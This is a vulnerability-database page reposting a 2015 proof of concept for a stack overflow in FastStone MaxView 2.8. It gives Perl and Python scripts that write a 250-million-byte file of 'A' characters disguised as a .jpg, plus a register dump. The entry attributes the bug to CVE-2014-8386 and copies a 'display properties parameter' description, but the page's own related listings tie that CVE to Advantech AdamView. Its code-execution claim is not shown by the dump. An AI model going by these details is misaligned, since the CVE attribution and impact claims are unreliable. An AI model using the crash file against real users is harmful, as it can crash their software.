Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

FastStone MaxView 2.8 Stack Overflow

🗓️ 02 Jul 2015 00:00:00Reported by Hossein HezamiType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 32 Views

FastStone MaxView 2.8 (.jpg) local Stack Overflow PoC. Code execution through buffer overflow in FastStone MaxView 2.8 (.jpg) allows local exploitation. MSEAS35+

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Advantech AdamView 4.3 Buffer Overflow Vulnerability
20 Nov 201400:00
zdt
0day.today		Advantech AdamView 4.30.003 - (.gni) SEH Buffer Overflow Exploit
10 Dec 201400:00
zdt
ATTACKERKB		CVE-2014-8386
20 Jan 201515:59
attackerkb
ATTACKERKB		Advantech Adamview Buffer Overflow
20 Jan 201500:00
attackerkb
Core Security		Advantech AdamView Buffer Overflow
19 Nov 201400:00
coresecurity
Check Point Advisories		Advantech ADAMView Display Properties Parameter Remote Code Execution (CVE-2014-8386)
29 Dec 201400:00
checkpoint_advisories
Check Point Advisories		Advantech ADAMView Conditional Bitmap Remote Code Execution (CVE-2014-8386)
14 Jan 201500:00
checkpoint_advisories
CVE		CVE-2014-8386
20 Jan 201515:00
cve
Cvelist		CVE-2014-8386
20 Jan 201515:00
cvelist
Exploit DB		Advantech AdamView 4.30.003 - '.gni' Local Buffer Overflow (SEH)
9 Dec 201400:00
exploitdb
Rows per page
`#######################################################################  
# Title : FastStone MaxView 2.8 (.jpg) local Stack Overflow PoC  
# Program : FastStone MaxView  
# Author : Dr.3v1l  
# Date : 2015 01 July  
# Website : http://www.faststone.org  
# Download : http://www.faststonesoft.net/DN/FSMaxViewSetup28.exe  
# Version : 2.8  
# Type : (.jpg File) local Stack Overflow PoC  
#######################################################################  
#  
# 01. Vulnerability Information  
#   
# Class: Buffer overflow [CWE-119]  
# Impact: Code execution  
# Remotely Exploitable: No  
# Locally Exploitable: Yes  
# CVE Name: CVE-2014-8386  
#   
# 02. Technical Description / Proof of Concept Code  
#   
# This vulnerability is caused by a stack buffer overflow when parsing  
# the display properties parameter. A malicious third party could trigger  
# execution of arbitrary code within the context of the application, or  
# otherwise crash the whole application.  
#  
# EAX 54A30018 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
# ECX 0013D2A8  
# EDX 7767D370 ntdll.KiFastSystemCallRet  
# EBX 00000000  
# ESP 0013D2A8  
# EBP 0013D30C  
# ESI 0013D328  
# EDI 000007A4  
# EIP 7767D370 ntdll.KiFastSystemCallRet  
# C 0 ES 0023 32bit 0(FFFFFFFF)  
# P 1 CS 001B 32bit 0(FFFFFFFF)  
# A 0 SS 0023 32bit 0(FFFFFFFF)  
# Z 1 DS 0023 32bit 0(FFFFFFFF)  
# S 0 FS 003B 32bit 7FFDF000(4000)  
# T 0 GS 0000 NULL  
# D 0  
# O 0 LastErr ERROR_SUCCESS (00000000)  
# EFL 00000246 (NO,NB,E,BE,NS,PE,GE,LE)  
# ST0 empty -??? FFFF 000000FF 00FF00FF  
# ST1 empty 4.7021112344749837450e+18  
# ST2 empty 4.7021112344749837450e+18  
# ST3 empty 4.7021112344749837450e+18  
# ST4 empty 4.7021112344749837450e+18  
# ST5 empty 4.7021112344749837450e+18  
# ST6 empty 4.7021112344749837450e+18  
# ST7 empty 4.7021112344749837450e+18  
# 3 2 1 0 E S P U O Z D I  
# FST 4000 Cond 1 0 0 0 Err 0 0 0 0 0 0 0 0 (EQ)  
# FCW 127F Prec NEAR,53 Mask 1 1 1 1 1 1  
#   
# ---------------------------------------------------------------------  
#   
# PoC (PERL) :  
#   
# my $file="3v1l.jpg";  
# open(my $FILE, ">>$file") or die "Cannot open $file: $!";  
# print $FILE "\x41" x 250000000;  
# close($FILE);  
# print "$file has been created \n";  
#   
#   
# PoC (PYTHON) :  
#   
# file="3v1l.jpg"  
# junk="\x41"*250000000  
# writeFile = open (file, "w")  
# writeFile.write(junk)  
# writeFile.close()  
#  
#######################################################################  
#  
# [+] Contact Me :  
#  
# [email protected]  
# Twitter.com/Doctor_3v1l  
# Twitter.com/blackdevilsb0ys  
# Facebook.com/blackdevilsb0ys  
# Linkedin.com/in/hossein3v1l  
# Hossein Hezami - Black_Devils B0ys  
#  
#######################################################################  
# Black_Devils B0ys - blackdevilsb0ys.ir  
#######################################################################  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Jul 2015 00:00Current
0.6Low risk
Vulners AI Score0.6
EPSS0.27881
faststone maxviewbuffer overflowcode executionlocal exploitationcve-2014-8386
32